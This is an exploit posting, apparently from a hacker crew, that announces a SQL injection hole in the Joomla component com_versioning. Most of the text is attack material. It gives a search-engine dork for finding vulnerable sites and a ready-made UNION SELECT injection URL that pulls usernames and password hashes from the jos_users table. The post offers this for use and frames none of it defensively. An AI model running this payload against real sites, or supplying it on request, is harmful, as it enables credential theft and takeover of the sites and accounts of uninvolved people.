[+] Name : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability [+] Team : DarkMatter Crew [+] Crew website : WwW.SykoPainKilla.CoM [+] Author : SpK & His0k4 [+] Contact : fatal.1.ty[at]hotmail.com[dot]com [+] D0rk : inurl:index.php?option=com_versioning [+] Expl0iT : http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users-- # # # # ############################################ # Visit our website www.sykopainkilla.com # # # #DarmMatter & SpK F0R3V3R # # ############################################ # # # # side note: versioning 11.14.2006 Thomas Papin This component is released under the GNU/GPL License. thomas.papin@free.fr www.joomprod.com 1.0.2